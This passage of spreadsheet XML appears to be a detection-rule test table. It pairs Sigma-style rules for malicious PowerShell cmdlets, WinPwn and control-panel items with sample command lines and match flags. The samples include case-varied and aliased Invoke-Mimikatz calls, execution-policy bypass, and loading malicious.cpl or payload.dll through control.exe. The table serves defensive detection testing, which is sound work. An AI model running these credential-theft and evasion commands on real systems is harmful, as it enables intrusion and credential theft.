      <c r="B3361" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3361" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3361" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3361" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3361" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3361" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I336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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3361" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3362" ht="15.75" customHeight="1" s="42">
      <c r="A3362" s="43" t="n"/>
      <c r="B3362" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3362" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3362" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3362" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F3362" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3362" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I33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2" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3362" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3363" ht="15.75" customHeight="1" s="42">
      <c r="A3363" s="44" t="n"/>
      <c r="B3363" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3363" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3363" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3363" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3363" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3363" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I336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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3363" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3364" ht="15.75" customHeight="1" s="42">
      <c r="A3364" s="44" t="n"/>
      <c r="B3364" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3364" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3364" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3364" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3364" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3364" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3364" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3365" ht="15.75" customHeight="1" s="42">
      <c r="A3365" s="44" t="n"/>
      <c r="B3365" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3365" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3365" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3365" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3365" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3365" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3365" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3366" ht="15.75" customHeight="1" s="42">
      <c r="A3366" s="44" t="n"/>
      <c r="B3366" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3366" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3366" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3366" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3366" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3366" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3366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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3366" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3367" ht="15.75" customHeight="1" s="42">
      <c r="A3367" s="44" t="n"/>
      <c r="B3367" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3367" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3367" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3367" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3367" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3367" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3367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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3367" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3368" ht="15.75" customHeight="1" s="42">
      <c r="A3368" s="44" t="n"/>
      <c r="B3368" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3368" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3368" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3368" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3368" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3368" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3368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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3368" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3369" ht="15.75" customHeight="1" s="42">
      <c r="A3369" s="44" t="n"/>
      <c r="B3369" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3369" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3369" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3369" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F3369" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3369" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3369" s="44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69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3369" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3370" ht="15.75" customHeight="1" s="42">
      <c r="A3370" s="44" t="n"/>
      <c r="B3370" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3370" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3370" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3370" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3370" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3370" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3370" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3371" ht="15.75" customHeight="1" s="42">
      <c r="A3371" s="43" t="n"/>
      <c r="B3371" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3371" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3371" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3371" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3371" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3371" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I33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1" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3371" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3372" ht="15.75" customHeight="1" s="42">
      <c r="A3372" s="44" t="n"/>
      <c r="B3372" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3372" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3372" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3372" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3372" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3372" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3372" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I33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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3372" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3373" ht="15.75" customHeight="1" s="42">
      <c r="A3373" s="44" t="n"/>
      <c r="B3373" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3373" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3373" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3373" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3373" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3373" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3373" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3373" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3374" ht="15.75" customHeight="1" s="42">
      <c r="A3374" s="44" t="n"/>
      <c r="B3374" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3374" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3374" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3374" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3374" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3374" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3374" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3374" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3375" ht="15.75" customHeight="1" s="42">
      <c r="A3375" s="44" t="n"/>
      <c r="B3375" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3375" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3375" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3375" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3375" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3375" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3375" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3375" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3376" ht="15.75" customHeight="1" s="42">
      <c r="A3376" s="44" t="n"/>
      <c r="B3376" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C3376" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D3376" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E3376" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F3376" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3376" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3376" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I337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3376" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3376" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3377" ht="15.75" customHeight="1" s="42">
      <c r="A3377" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3377" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3377" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3377" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3377" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F3377" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3377" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3377" s="43" t="n"/>
      <c r="J3377" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3377" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3378" ht="15.75" customHeight="1" s="42">
      <c r="A3378" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3378" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3378" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3378" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3378" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F3378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3378" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3378" s="43" t="n"/>
      <c r="J3378" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3378" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3379" ht="15.75" customHeight="1" s="42">
      <c r="A3379" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3379" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3379" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3379" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3379" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3379" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3379" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3379" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3379" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3379" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3380" ht="15.75" customHeight="1" s="42">
      <c r="A3380" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3380" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3380" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3380" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3380" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3380" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3380" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3380" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3380" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3380" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3381" ht="15.75" customHeight="1" s="42">
      <c r="A3381" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3381" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3381" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3381" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3381" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3381" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3381" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3381" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3381" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3381" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3382" ht="15.75" customHeight="1" s="42">
      <c r="A3382" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3382" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3382" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3382" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3382" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3382" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3382" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3382" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3382" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3382" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3383" ht="15.75" customHeight="1" s="42">
      <c r="A3383" s="44" t="inlineStr">
        <is>
          <t>t1518</t>
        </is>
      </c>
      <c r="B3383" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3383" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3383" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3383" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F3383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3383" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3383" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3383" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J3383" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3383" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3384" ht="15.75" customHeight="1" s="42">
      <c r="A3384" s="43" t="inlineStr">
        <is>
          <t>t1546</t>
        </is>
      </c>
      <c r="B3384" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3384" s="43" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3384" s="43" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3384" s="43" t="inlineStr">
        <is>
          <t>control.exe C:\temp\System32\malicious.cpl</t>
        </is>
      </c>
      <c r="F3384" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3384" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3384" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3384" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J3384" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K3384" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3385" ht="15.75" customHeight="1" s="42">
      <c r="A3385" s="44" t="inlineStr">
        <is>
          <t>t1546</t>
        </is>
      </c>
      <c r="B3385" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3385" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3385" s="44" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3385" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe "C:\Users\Public\Downloads\malicious.cpl "</t>
        </is>
      </c>
      <c r="F3385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3385" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3385" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3385" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff)</t>
        </is>
      </c>
      <c r="J3385" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3385" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3386" ht="15.75" customHeight="1" s="42">
      <c r="A3386" s="44" t="inlineStr">
        <is>
          <t>t1546</t>
        </is>
      </c>
      <c r="B3386" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_control_panel_item</t>
        </is>
      </c>
      <c r="C3386" s="44" t="inlineStr">
        <is>
          <t>Control Panel Items</t>
        </is>
      </c>
      <c r="D3386" s="44" t="inlineStr">
        <is>
          <t>0ba863e6-def5-4e50-9cea-4dd8c7dc46a4</t>
        </is>
      </c>
      <c r="E3386" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\control.exe C:\Users\Public\Downloads\payload.dll</t>
        </is>
      </c>
      <c r="F3386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3386" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3386" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3386" s="43" t="inlineStr">
        <is>
          <t>Shell32 DLL Execution in Suspicious Directory (32b96012-7892-429e-b26c-ac2bf46066ff); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J3386" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3386" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3387" ht="15.75" customHeight="1" s="42">
      <c r="A3387" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3387" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3387" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3387" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3387" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F3387" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3387" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3387" s="44" t="n"/>
      <c r="J3387" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3387" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3388" ht="15.75" customHeight="1" s="42">
      <c r="A3388" s="44" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B3388" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C3388" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D3388" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E3388" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F3388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3388" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3388" s="44" t="b">
